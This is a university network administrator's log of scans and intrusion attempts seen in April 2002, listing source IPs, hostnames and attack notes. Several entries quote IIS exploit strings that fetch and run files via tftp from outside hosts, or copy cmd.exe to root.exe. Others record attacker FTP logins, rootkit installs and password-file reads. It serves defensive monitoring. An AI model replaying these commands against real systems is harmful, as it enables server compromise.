Short summary of some of the attacks against us for Apr. 2002

year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/04/01-02:54:02.90 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) scannet for port 137,161
2002/04/01-02:58:26.79 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) ICMP timestamp request scan of 132.235.2.x
2002/04/01-02:58:26.80 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) ICMP info request scan of 132.235.2.x
2002/04/01-04:13:56.28 61.177.253.33 (CHINANET Jiangsu province network,CN) attack IIS w/buff overflow=tftp%20-i%20132.0.0.7%20GET%20Admin.dll%20c
2002/04/01-06:00:00.00 202.188.74.15 (sp-74-15.tm.net.my) continue to run irc reflector on hacked machine all day long. Also try to get root
2002/04/01-06:56:50.28 166.104.123.116 (Hanyang University, SEOUL,KR) scannet for port 21
2002/04/01-07:45:00.33 62.163.229.100 (a229100.upc-a.chello.nl) scannet with ping
2002/04/01-07:45:00.77 62.163.229.100 (a229100.upc-a.chello.nl) scan several ips for port 1433
2002/04/01-11:03:00.11 62.211.25.228 (Telecom Italia Net,IT) scannet for port 21
2002/04/01-11:13:58.19 128.122.20.205 (CSSTUPC1.CS.NYU.EDU) scannet for port 21
2002/04/01-13:40:54.29 210.187.192.133 (TMnet Telekom Malaysia,MY) ping scan of net
2002/04/01-13:49:34.67 210.187.192.133 (TMnet Telekom Malaysia,MY) scannet for ports 79,161,1524
2002/04/01-14:51:22.01 142.154.129.14 (lon-on52-014.netcom.ca) SCAN NET FOR PORT 137
2002/04/01-16:47:39.22 195.127.27.16 (linux1.alltec.org) scannet for port 21
2002/04/01-17:22:13.01 138.89.61.227 (pool-138-89-61-227.mad.east.verizon.net) SCAN NET FOR PORT 137
2002/04/01-18:37:32.19 24.208.179.213 (dhcp024-208-179-213.columbus.rr.com) scannet for port 21, anon ftp attack
2002/04/01-23:01:20.57 209.88.66.241 (CABLE & WIRELESS ANTIGUA,ST. John, AG) scannet for port 22
2002/04/02-07:16:43.12 194.204.218.148 (Ministere des Affaires Etrangeres et de la Cooperation,MA) scannet for port 137
2002/04/02-08:20:47.57 24.188.166.166 (ool-18bca6a6.dyn.optonline.net) scannet for ports 137,445,139
2002/04/02-10:45:40.04 141.155.35.11 (pool-141-155-35-11.ny5030.east.verizon.net) scannet for ports 137,139,and heavy on 534
2002/04/02-12:32:34.07 132.235.238.1 (admin.memaud.ohiou.edu) scan 132.235.*:38293
2002/04/02-12:58:38.96 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/04/02-13:46:06.85 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scan select ips on port 21,anon ftp
2002/04/02-13:48:01.01 12.81.86.66 (66.san-francisco-05-10rs.ca.dial-access.att.net) scan 132.235.16.*:137
2002/04/02-14:18:20.41 64.229.152.132 (HSE-Ottawa-ppp163049.sympatico.ca) scannet for ports 137,524,139
2002/04/02-15:13:37.04 131.164.182.202 (0x83a4b6ca.virnxx9.adsl-dhcp.tele.dk) scan 132.235.16.*:137
2002/04/02-18:41:42.25 61.177.254.51 (CHINANET Jiangsu province network,CN) 1. scannet for port 80,
2002/04/02-18:41:42.25 61.177.254.51 (CHINANET Jiangsu province network,CN) 2. attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll
2002/04/02-19:55:27.10 210.110.144.38 (Tongmyong University of Information Technology,KR) scannet for port 53
04/03-10:29:10.03 203.129.231.196 (STPI-Nagpur's Network,IN) scan 132.235.16.*:137
04/03-11:38:00.04 212.179.202.92 (bzq-202-92.red.bezeqint.net) scan 132.235.*.*:80
04/03-13:10:15.07 141.152.145.73 (pool-141-152-145-73.norf.east.verizon.net) scan 132.235.16.*:137
04/03-17:09:39.04 213.73.189.175 (qn-213-73-189-175.quicknet.nl) scan 132.235.*.*:80
04/03-21:25:07.10 61.177.246.179 (CHINANET Jiangsu province network,CN) scan 132.235.*.*:80
04/04-04:50:26.22 80.135.82.109 (p5087526D.dip.t-dialin.net) scan 132.235.*.*:80
2002/04/02-20:30:50.07 12.74.100.242 (242.dallas-11-12rs.tx.dial-access.att.net) scan 132.235.16.*:137
2002/04/03-01:08:39.95 216.153.137.152 (host-216-153-137-152.choiceone.net) scannet for port 515
2002/04/03-02:03:03.01 12.86.88.186 (186.birmingham-01-02rs.al.dial-access.att.net) scan 132.235.16.*:137
2002/04/03-03:10:20.70 216.167.144.189 (www.floyd.k12.nm.us) scannet for port 111
2002/04/03-03:17:12.23 198.67.10.169 (UNITY SOFTWARE SYSTEMS ,AZ,US) scannet for port 111,rstatd
2002/04/03-03:46:00.16 61.177.246.64 (CHINANET Jiangsu province network,CN) 1. scannet for port 80,
2002/04/03-03:46:00.16 61.177.246.64 (CHINANET Jiangsu province network,CN) 2. attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20e:\Admin.dll
2002/04/03-05:00:43.47 198.67.10.169 (UNITY SOFTWARE SYSTEMS ,AZ,US) start of buff overflow attacks -sadmind
2002/04/03-07:18:59.76 217.227.183.138 (pD9E3B78A.dip.t-dialin.net) scannet for port 80
2002/04/03-09:32:26.61 210.83.251.95 (China Netcom Corp.,CN) netscan port 80, attack iis tftp%20-i%20132.102.65.99%20GET%20Admin.dll
2002/04/03-09:43:35.10 24.202.96.150 (modemcable150.96-202-24.mtl.mc.videotron.ca) scannet for port 21,anon ftp attack
2002/04/03-10:13:34.13 209.128.161.226 (209-128-161-226.dial-up.ipa.net) scan 1 ip for port 21, 6000
2002/04/03-11:36:46.66 212.179.202.92 (bzq-202-92.red.bezeqint.net) scannet for port 80
2002/04/03-13:38:52.43 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slow scannet for port 524
2002/04/03-15:40:05.50 209.128.161.226 (209-128-161-226.dial-up.ipa.net) scan 2 ips for port 21, 6000
2002/04/03-15:46:20.05 132.235.90.7 (?.ohou.edu) scannet for port 38293 UDP
2002/04/03-17:07:33.36 213.73.189.175 (qn-213-73-189-175.quicknet.nl) scannet for port 80
2002/04/03-19:26:45.84 209.128.161.221 (209-128-161-221.dial-up.ipa.net) scan 1 ip for port 21, 6000
2002/04/03-21:40:01.39 209.128.161.254 (254128-161-226.dial-up.ipa.net) scan 1 ip for port 21, 6000
2002/04/04-02:22:06.76 61.177.253.29 (CHINANET Jiangsu province network,CN) scannet for port 80,attack =tftp%20-i%20132.235.80.92%20GET%20Admin.dll
2002/04/04-04:49:44.09 80.135.82.109 (p5087526D.dip.t-dialin.net) scannet for port 80
2002/04/04-07:28:19.52 218.2.20.131 (CHINANET Jiangsu province network,CN) 1. scannet for port 80 (iis servers)
2002/04/04-07:28:19.52 218.2.20.131 (CHINANET Jiangsu province network,CN) 2. attack IIS w/ tftp%20-i%20132.237.7.175%20GET%20Admin.dll
2002/04/04-07:50:34.50 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21,anon ftp attack
2002/04/04-10:05:26.63 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/04/04-12:37:53.71 203.204.162.240 (u162-240.u203-204.giga.net.tw) scan several ips for port 21
2002/04/04-12:37:59.42 203.204.162.240 (u162-240.u203-204.giga.net.tw) scannet for port 21
2002/04/04-12:45:35.60 211.159.31.98 (GuangDong Gosun Internet Information & Technology evelopment Co,CN) scan 132.235.*.8:1524
2002/04/04-16:10:57.41 141.211.28.138 (bus-print1.bus.umich.edu) ping scan of net
2002/04/04-16:16:57.59 141.211.28.138 (bus-print1.bus.umich.edu) scannet for port 3389
2002/04/04-20:40:09.29 80.135.82.109 (p5087526D.dip.t-dialin.net) ping scan of several ips
2002/04/05-02:03:18.26 216.78.86.33 (host-216-78-86-33.gnv.bellsouth.net) scannet for port 80
2002/04/05-04:51:27.34 61.177.255.54 (CHINANET Jiangsu province network,CN) 1. scannet for port 80
2002/04/05-04:51:27.34 61.177.255.54 (CHINANET Jiangsu province network,CN) 2. iis attack tftp%20-i%20132.235.80.92%20GET%20Admin.dll
2002/04/05-05:43:44.97 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) start of daily scans of net for port 524
2002/04/05-06:18:33.31 217.128.47.110 (AVelizy-103-1-3-110.abo.wanadoo.fr) scannet for port 21
2002/04/05-06:18:33.72 217.128.47.110 (AVelizy-103-1-3-110.abo.wanadoo.fr) scannet for port 21
2002/04/05-14:21:16.65 132.235.178.169 (dhcp-178-169.south-green.ohiou.edu) slowscan - netbios name query
2002/04/05-14:59:48.85 213.171.35.98 (Network for Set` 21,RU) scannet for port 21
2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 1.attack IIS server w/buff overflow cmds to create bat file with commands:
2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 2."ftp.mitglied.lycos.de 21","chromeangel1" "fettcrass"
2002/04/05-15:53:09.40 141.76.1.122 (proxy2.anon-online.org) 3."get serv-u.exe" "get serv-u.ini" "quit"
2002/04/06-01:20:33.63 24.184.145.246 (ool-18b891f6.dyn.optonline.net) scan 132.235.201.168 ports 27374,12345,139
2002/04/06-01:36:31.54 216.153.136.122 (host-216-153-136-122.choiceone.net) scannet for port 21
2002/04/06-04:45:16.67 68.48.241.50 (pcp736242pcs.reston01.va.comcast.net) scannet for port 21
2002/04/06-08:45:45.47 61.251.171.111 (N-CASH,SEOUL,KR) scannet for port 22
2002/04/06-13:14:11.40 203.75.114.184 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21
2002/04/06-16:22:03.19 141.76.1.121 (proxy1.anon-online.org) 1. download serv-u.exe, serv-u.ini
2002/04/06-16:22:03.19 141.76.1.121 (proxy1.anon-online.org) 1. iis server attack - ftp to 213.193.0.36 chromeangel1/fettcrass
2002/04/06-16:51:49.74 209.235.58.117 (117-209.235.58.interliant.com) scannet for port 515
2002/04/06-19:46:57.04 61.177.253.142 (CHINANET Jiangsu province network,CN) IIS buff overflow -tftp%20-i%20132.235.80.92%20GET%20Admin.dll
2002/04/06-21:00:44.31 63.136.113.198 (Cable and Wireless LTD -Cayman,KY) scannet for port 21,anon ftp attacks
2002/04/06-21:52:30.05 64.105.205.140 (h-64-105-205-140.CMBRMAOR.covad.net) scannet for port 21
2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) ftp 210.49.1.200 scott/koold00d get psybnc stuff from .sbin
2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) ftp to 211.239.122.9 hurim/d00msday get psybnc stuff from .sbin
2002/04/06-23:09:30.49 210.186.52.32 (TMnet Telekom Malaysia,MY) logon to condor using multiple stolen passwd
2002/04/07-03:54:14.50 211.43.165.212 (E2B,SEOUL,KR) 1. probe condor with finger; login as mcgeem. look around.
2002/04/07-03:54:14.50 211.43.165.212 (E2B,SEOUL,KR) 2. buff overflow attack directly at condor, try to setup inetd on listen port
2002/04/07-03:54:14.86 211.43.165.212 (E2B,SEOUL,KR) ftp to condor, put sun1.tar on /var/tmp.
2002/04/07-06:11:26.22 216.110.167.66 (CyberGate, Inc,FL,US) scannet for port 21
2002/04/07-13:16:19.58 132.235.178.169 (dhcp-178-169.south-green.ohiou.edu) slowscan - netbios name query
2002/04/07-23:15:31.12 61.177.246.207 (CHINANET Jiangsu province network) IIS server attack - tftp%20-i%20132.235.80.92%20GET%20Admin.dll
2002/04/08-05:59:09.45 61.142.135.43 (CHINANET Guangdong province network) 1. scan net for port 80, IIS attack w/comman
2002/04/08-05:59:09.45 61.142.135.43 (CHINANET Guangdong province network) 2. tftp%20-i%20132.116.64.182%20GET%20cool.dll%20c:\httpodbc.dll
2002/04/08-06:17:58.13 132.72.135.100 (cim.bgu.ac.il) 1. scan net for port 80, IIS attack w/comman
2002/04/08-06:17:58.13 132.72.135.100 (cim.bgu.ac.il) 2. tftp%20-i%20132.72.135.100%20GET%20cool.dll%20c:\httpodbc.dll
2002/04/08-08:13:48.72 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 137 - netbios name query
2002/04/08-17:12:09.12 206.230.62.10 (SPRINT,VA,US) scannet for port 21
2002/04/08-17:27:43.56 62.62.190.211 (9 Telecom,FR) scannet for port 21 - anon ftp attack
2002/04/08-17:47:39.96 156.35.88.172 (fanae02.geol.uniovi.es) scannet for port 21
2002/04/08-20:13:25.16 203.255.180.157 (real.ewha.ac.kr) scannet for port 22
2002/04/08-20:30:25.18 80.141.62.50 (p508D3E32.dip.t-dialin.net) ping scan of net
2002/04/08-23:03:19.20 61.177.246.113 (CHINANET Jiangsu province network) 1. scan net for port 80, IIS attack w/comman
2002/04/08-23:03:19.20 61.177.246.113 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20e:\Admin.dll
2002/04/08-23:40:31.94 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) 1. scannet for ports 79,161,1524
2002/04/08-23:40:31.94 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) 2. try to login to selected ips w/ password = loginid
2002/04/09-02:14:55.16 212.185.253.130 (cw02.D1.srv.t-online.de) scan 6 ips for port 80
2002/04/09-02:15:09.64 212.185.253.140 (cw08.D1.srv.t-online.de) scan 9 ips for port 80
2002/04/09-02:15:12.46 212.185.253.139 (cw07.D1.srv.t-online.de) scan 7 ips for port 80
2002/04/09-02:15:28.89 212.185.253.137 (cw05.D1.srv.t-online.de) scan 5 ips for port 80
2002/04/09-03:03:23.30 167.206.47.44 (WENDELL.CONCISION.COM) scannet for port 22
2002/04/09-03:27:47.50 132.234.96.82 (bc405.ocsstud.gu.edu.au) scannet for port 137 - netbios name query
2002/04/09-04:17:25.11 24.27.182.214 (cvg-27-182-214.cinci.rr.com) scannet for port 12345
2002/04/09-05:23:25.87 80.14.43.19 (ASt-Lambert-102-1-5-19.abo.wanadoo.fr) scannet for port 21
2002/04/09-06:07:02.35 80.11.207.67 (AAnnecy-101-1-5-67.abo.wanadoo.fr) scannet for port 21 - anon ftp attack
2002/04/09-09:48:21.99 132.235.94.25 (stupidity at ohiou.edu) scannet for port 41524
2002/04/09-15:08:31.55 213.106.143.133 (public1-warr2-5-cust133.manc.broadband.ntl.com) scannet for port 80
2002/04/09-16:12:38.96 217.82.231.30 (pD952E71E.dip.t-dialin.net) scannet for port 80,heavy IIS attacks
2002/04/09-18:10:02.13 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 137
2002/04/09-18:19:06.69 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for ICMP Address Mask Request,ICMP Timestamp Reques
2002/04/09-19:43:23.21 212.120.82.106 (cp86479-a.dbsch1.nb.nl.home.com) scannet for port 80,heavy IIS attacks
2002/04/09-19:59:34.56 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for NETBIOS Samba clientaccess
2002/04/09-21:01:58.64 65.117.102.111 (WATERFORD INSTITUTE,UT,US) scannet for port 139,445
2002/04/09-23:36:52.33 166.90.225.10 (dialup-166.90.225.10.Dial1.Detroit1.Level3.net) scannet for NETBIOS SMB C access
2002/04/10-00:56:54.28 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) scannet for ports 79 (user=123),161,1524, ping
2002/04/10-01:28:20.84 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia,MY) Use finger info to telnet to ips using passwd=loginid
2002/04/10-02:13:47.10 80.133.108.17 (p50856C11.dip.t-dialin.net) scannet for port 80
2002/04/10-02:21:23.76 193.253.230.76 (ALyon-102-1-2-76.abo.wanadoo.fr) scannet for port 21
2002/04/10-03:15:19.22 132.235.168.93 (dhcp-168-093.west-green.ohiou.edu) probe 132.235.1.[1,12] port 21
2002/04/10-04:39:04.11 200.24.70.26 (IFX networks,BOGOTA,CO) scannet for port 21
2002/04/10-08:26:36.12 198.234.252.9 (oarnet...) multiple anon ftp attempts
2002/04/10-09:09:58.16 193.253.215.84 (AMontpellier-201-1-2-84.abo.wanadoo.fr) scannet for port 21
2002/04/10-14:26:27.28 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) a-PPPdialup,DE, start attack endor w/ telnet buff overflow attacks
2002/04/10-14:32:29.03 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) access endor port 2001 cat /etc/passwd,shadow
2002/04/10-14:41:51.34 130.15.96.39 (portia.psyc.QueensU.CA) use cracked acct on endor, download sun.tar.Z
2002/04/10-14:48:40.96 212.211.83.35 (fra-tgn-oyd-vty35.as.wcom.net) telnet in and install rootkit in /usr/share/man/man1/.lc
2002/04/10-16:11:47.27 217.136.112.229 (adsl-61669.turboline.skynet.be) scannet for port 21 - anon ftp attack
2002/04/10-17:01:06.84 217.136.112.229 (adsl-61669.turboline.skynet.be) re-scannet for port 21 - anon ftp attack
2002/04/10-23:04:42.89 132.208.21.68 (Universite du Quebec a Montreal,CA) scan net for port 21
2002/04/11-11:58:43.93 210.103.80.10 (BUIL ELECTRONIC HIGH SCHOOL,KR) scannet for port 21
2002/04/11-14:43:45.46 210.3.1.215 (Hutchison Global Crossing Ltd.,HK) scannet for port 21
2002/04/11-15:13:35.84 211.219.153.206 (KOREA TELECOM,KR) scannet for port 21
2002/04/11-16:24:13.77 216.47.159.136 (host136.cslab.iit.edu) scannet for port 21
2002/04/11-18:31:41.61 195.232.60.10 (fra-tgn-ozb-vty10.as.wcom.net) 1.back hacking on endor. ftp to 206.47.72.55 leggimi/100582
2002/04/11-18:31:41.61 195.232.60.10 (fra-tgn-ozb-vty10.as.wcom.net) 2. to get eggbot. install.
2002/04/12-01:37:22.01 24.138.61.171 (SHW61-171.accesscable.net) scannet for port 80
2002/04/12-08:17:52.01 209.165.3.100 (sql.lightspeed.net) scannet for port 21 (SYN/FIN scan)
2002/04/12-10:15:46.25 66.189.162.152 (Charter Communications,MO,US) portscan 132.235.16.236
2002/04/12-14:47:25.79 24.138.61.171 (SHW61-171.accesscable.net) IIS attack tftp.exe+"-i"+24.138.61.171+get+WINLOGIN.EXE+c:\WINLOGIN.EXE
2002/04/12-14:48:51.89 213.29.6.8 (Iran Telecommunication Research Center,iR) scannet for port 21
2002/04/12-16:15:19.40 216.254.162.32 (dialin-162-32.tor.primus.ca) scannet for port 445
2002/04/12-16:15:54.93 213.104.178.254 (m766-mp1-cvx3a.not.ntl.com) scannet for port 445
2002/04/12-16:16:18.93 62.253.12.159 (m159-mp1-cvx1c.edi.ntl.com) scannet for port 445
2002/04/12-16:16:29.48 66.125.96.136 (Starstream Communications,CA,US) scannet for port 445
2002/04/12-16:17:53.10 216.31.6.67 (rdo-dialA-67.zianet.com) scannet for port 445
2002/04/13-01:28:02.91 202.185.243.121 (Ins Peny Minyak K.Sawit M'sia (PORIM),MY) scannet for ports 79,161,1524,ping
2002/04/13-03:04:40.77 211.33.221.132 (Korea crap) scannet for port 21
2002/04/13-04:58:46.56 12.233.26.173 (12-233-26-173.client.attbi.com) scannet for port 445
2002/04/13-06:14:57.53 12.233.26.173 (12-233-26-173.client.attbi.com) scannet for port 445
2002/04/13-07:04:28.19 211.33.221.132 (Korea crap) scannet for port 21
2002/04/13-20:35:28.47 218.44.208.100 (Digital Resource Company,KAMEKICHI,JP) scannet for port 21
2002/04/14-03:59:41.39 195.64.92.180 (cust.92.180.adsl.cistron.nl) ping scan of net
2002/04/14-05:14:06.16 212.194.49.31 (lns03m-2-31.w.club-internet.fr) scannet for port 21
2002/04/14-06:05:51.32 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - copy+..\..\winnt\system32\cmd.exe+exchange.exe
2002/04/14-06:05:51.32 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - tftp+-i+195.64.92.180+GET+servudaemon.exe
2002/04/14-06:10:49.66 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - tftp+-i+195.64.92.180+GET+TzoLibr.dll
2002/04/14-06:33:13.76 195.64.92.180 (cust.92.180.adsl.cistron.nl) IIS attack - c:\Inetpub\scripts\servudaemon.exe+/u+/h+c:\Inetpub\scripts\servudaemon.ini
2002/04/14-07:00:11.01 217.226.246.105 (pD9E2F669.dip.t-dialin.net) scannet for port 80
2002/04/14-07:37:51.52 212.239.200.88 (u212-239-200-88.adsl.pi.be) IIS attack - copy%20c:\winnt\system32\cmd.exe%20testing.exe
2002/04/14-11:12:47.97 207.24.185.233 (Siemens Medical System,IL,US) scannet for port 2008
2002/04/14-22:13:01.90 212.211.91.6 (fra-tgn-oyl-vty6.as.wcom.net) scannet for port 139
2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 1. IIS attack - copy+C:\winnt\system32\cmd.exe+C:\root.exe
2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 2. create bat file to ftp to 131.234.20.71 as hack/mich to download
2002/04/14-22:53:55.06 66.119.33.167 (proxy.ia4.marketscore.com) 3. svchost.exe ServUDaemon.ini tlist.exe ncx99.exe httpodbc.dll
2002/04/15-00:02:14.34 66.119.33.167 (proxy.ia4.marketscore.com) hack IIS, run ftpd USER Equa/kalahari, login from 217.85.118.92
2002/04/15-09:53:27.89 217.85.83.225 (pD95553E1.dip.t-dialin.net) scannet for port 80
2002/04/15-09:54:59.26 217.85.83.225 (pD95553E1.dip.t-dialin.net) scannet for port 80
2002/04/15-11:49:44.98 12.101.145.18 (18.muba.chrt.washdctt.dsl.att.net) scannet for port 22
2002/04/15-11:56:40.63 211.184.14.160 (Seoul Kongduk Elementary School,SEOUL,KR) scannet for port 21
2002/04/15-12:34:58.00 200.217.161.50 (Brazil hacker) scannet for ports 21,5555,6112,ping
2002/04/15-12:40:27.14 170.210.128.99 (srvuai.pab.unrc.edu.ar) buff overflow attack port 6112
2002/04/15-12:50:48.77 212.58.172.166 (qn-212-58-172-166.quicknet.nl) hack IIS server, install ftp daemon USER DFXP-Team/Filler
2002/04/15-14:34:44.65 217.227.151.151 (pD9E39797.dip.t-dialin.net) scannet for port 80
2002/04/15-16:29:18.69 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) scannet for port 80
2002/04/15-21:50:17.29 24.163.136.247 (wks-163-136-247.kscable.com) portscan 132.235.1.169
2002/04/15-22:06:54.65 212.211.85.28 (fra-tgn-oyf-vty28.as.wcom.net) buff overflow attacks, port 6112, against selected ips
2002/04/16-07:13:39.65 80.26.13.125 (80-26-13-125.uc.nombres.ttd.es) scan 132.235.3.13 : 443
2002/04/16-09:15:12.60 80.26.13.125 (80-26-13-125.uc.nombres.ttd.es) scan 132.235.17.13 : 443 132.235.19.13 : 443
2002/04/16-11:13:00.65 207.71.92.221 (shieldsup.grc.com) portscan 132.235.19.(64,19,)
2002/04/16-12:15:23.53 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) 1. scannet for port 80, IIS buff overflow attack
2002/04/16-12:15:23.53 217.57.45.98 (CEMENTERIA DI MONSELIE SPA,IT) 2. cmd = copy+\winnt\system32\cmd.exe+root.exe
2002/04/16-14:36:45.88 66.110.151.89 (adsl-66.110.151-89.globetrotter.net) scannet for port 80
2002/04/16-14:36:45.88 66.110.151.89 (adsl-66.110.151-89.globetrotter.net) scannet for port 80
2002/04/16-16:53:07.54 129.71.155.236 (West Virginia Network for Educational Telecomputing,WV,US) scannet for port 80, ping
2002/04/16-20:53:33.97 80.202.5.43 (80-202-5-43.dd.nextgentel.com) scannet for port 21 anon ftp attack
2002/04/17-05:28:08.58 203.198.112.254 (awork086254.netvigator.com) try to login to 132.235.17.1 as root/root
2002/04/17-07:28:36.13 63.11.20.233 (1Cust233.tnt11.sfo8.da.uu.net) scannet for port 80
2002/04/17-10:17:00.11 80.131.155.65 (p50839B41.dip.t-dialin.net) scannet for port 80
2002/04/17-12:04:19.40 195.64.92.180 (cust.92.180.adsl.cistron.nl) scannet for port 80
2002/04/17-12:25:09.19 129.71.155.236 (West Virginia Network for Educational Telecomputin,WV,US) scannet for port 80, IIS attack
2002/04/17-14:45:09.61 203.85.142.174 (pc174.timeproject.com.hk) scannet for port 21
2002/04/17-22:29:55.76 217.82.64.168 (pD95240A8.dip.t-dialin.net) scannet for port 21
2002/04/18-08:09:57.17 61.171.121.239 (CHINANET Shanghai province network,CN) scannet for port 80
2002/04/18-12:40:48.70 216.208.174.40 (Telesat Canada,ONTARIO,CA) scannet for port 21
2002/04/18-13:47:37.48 65.32.118.214 (6532118hfc214.tampabay.rr.com) scannet for port 21
2002/04/18-14:09:53.362831 80.132.185.26 (p5084B91A.dip.t-dialin.net) scannet for port 80
2002/04/18-14:44:02.834150 199.232.242.249 (miami-gnap-ip-199242-249.dynamic.ziplink.net) scannet for port 25
2002/04/18-15:21:10.78 203.85.142.174 (pc174.timeproject.com.hk) scannet for port 21
2002/04/18-15:33:44.61 80.14.210.110 (ALille-205-1-2-110.abo.wanadoo.fr) scannet for port 21,anon ftp attacks
2002/04/18-18:13:40.00 65.190.16.185 (dsl-65-190-16-185.telocity.com) scannet w/ netbios-name-query
2002/04/18-19:03:12.78 24.197.75.8 (wv-pkbrg-ubr-a-024-197-075-008.charterwv.net) scannet for port 1433
2002/04/18-22:05:23.251065 66.87.32.125 (cpe-66-87-32-125.ok.sprintbbd.net) scannet for port 22
2002/04/19-01:25:36.15 213.23.88.2:53 (svdns01.es-tec.net) scannet for port 53
2002/04/19-04:16:18.550024 200.72.3.36 (ENTEL CHILE S.A.,Santiago,CL) scannet for port 80
2002/04/19-08:07:19.03 207.219.210.250 (Lanis Corporation,ONTARIO.CA) scannet for port 80
2002/04/19-08:55:28.19 132.203.46.106 (ip-46-106.fsa.ulaval.ca) IIS attack, tftp%20-i%20132.203.46.106%20GET%20cool.dll%20d:\httpodbc.dll
2002/04/19-09:31:17.99 62.219.196.200 (bzq-196-200.lns.bezeqint.net) scannet for port 80
2002/04/19-09:44:15.03 200.72.3.36 (ENTEL CHILE S.A.,CL) scannet for port 80, sadmind worm access
2002/04/19-10:30:02.05 80.132.172.43 (p5084AC2B.dip.t-dialin.net) scannet for port 80
2002/04/19-15:55:49.70 211.184.128.70 (korea crap) scannet for port 22
2002/04/19-21:54:04.51 62.211.185.51 (Telecom Italia,IT) ping scan of net, scannet for port 21
2002/04/19-22:16:03.48 192.168.39.244 (mac addr = router) scannet for port 111
2002/04/20-06:41:49.41 148.245.169.2 (computadora.rasa.com.mx) scannet for port 21
2002/04/20-10:17:17.84 217.136.154.82 (adsl-72274.turboline.skynet.be) scannet for port 21, anon ftp attack
2002/04/20-15:55:57.86 65.221.79.23 (Frognet, Inc.,OH,US) scannet for port 21
2002/04/20-17:13:01.37 80.11.175.231 (ALille-205-1-1-231.abo.wanadoo.fr) scannet for port 21
2002/04/20-19:32:16.15 65.94.209.189 (MTL-HSE-ppp197093.qc.sympatico.ca) scannet for port 21
2002/04/20-23:14:01.72 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) portscan machines for port 21,22,137
2002/04/21-03:12:48.80 148.221.36.254 (dup-148-221-36-254.prodigy.net.mx) ping scan of net
2002/04/21-03:12:58.45 148.221.36.254 (dup-148-221-36-254.prodigy.net.mx) scannet for port 21
2002/04/21-04:44:13.96 65.94.209.189 (MTL-HSE-ppp197093.qc.sympatico.ca) scannet for port 21
2002/04/21-10:34:59.09 151.197.50.247 (pool-151-197-50-247.phil.east.verizon.net) scannet with ping
2002/04/21-10:40:49.04 194.152.130.65 (mail.kossuth-klub.hu) scannet for port 21
2002/04/21-10:43:33.69 61.76.220.234 (korea crap) scannet for port 21
2002/04/21-10:48:10.70 151.197.50.247 (pool-151-197-50-247.phil.east.verizon.net) scannet with netbios-name-query
2002/04/22-06:52:24.89 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21
2002/04/22-10:18:33.23 212.185.253.129 (cw01.D1.srv.t-online.de) scannet for port 80, whisker space splice attack
2002/04/22-10:44:05.46 211.21.252.74 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scannet for port 21
2002/04/22-10:44:24.82 211.21.252.74 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scannet for port 21
2002/04/22-12:13:57.32 80.136.209.148 (p5088D194.dip.t-dialin.net) scannet for port 80
2002/04/22-14:01:30.63 217.120.164.18 (cc31218-a.groni1.gr.nl.home.com) 1. attack IIS server with buff overflow cmds
2002/04/22-14:01:30.63 217.120.164.18 (cc31218-a.groni1.gr.nl.home.com) 2. using echo to build file \inetput\scripts\uplodad.asp
2002/04/22-18:38:21.20 61.197.216.58 (yugen-kaisha Shinjuku-Soft,JAPAN) scannet for port 21
2002/04/22-20:25:03.08 140.112.17.106 (donald.ee.ntu.edu.tw) scannet for port 80
2002/04/22-21:23:12.27 216.190.255.235 (Wasatch Hosting,UT,US) scannet for port 25
2002/04/22-21:48:45.24 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21,anon ftp attack
2002/04/23-00:05:09.76 24.205.120.236 (24-205-120-236.wc-dyn.charterpipeline.net) scannet for port 80,NETBIOS SMB C access
2002/04/23-00:05:57.73 65.93.96.3 (Kitchener-HSE-ppp3563614.sympatico.ca) scannet for port 80,NETBIOS SMB C access
2002/04/23-00:08:42.09 65.93.96.3 (Kitchener-HSE-ppp3563614.sympatico.ca) scannet for port 139
2002/04/23-01:56:20.35 203.90.87.146 (HCL Infinet Limited,IN) scannet for port 80,NETBIOS SMB C access
2002/04/23-03:01:48.28 141.158.2.220 (pool-141-158-2-220.phil.east.verizon.net) scannet for port 80,NETBIOS SMB C access
2002/04/23-03:07:40.57 62.31.152.87 (pc-62-31-152-87-fn.blueyonder.co.uk) scannet for port 80,NETBIOS SMB C access
2002/04/23-05:06:46.97 217.208.61.101 (h101n2fls32o883.telia.com) scannet for port 21
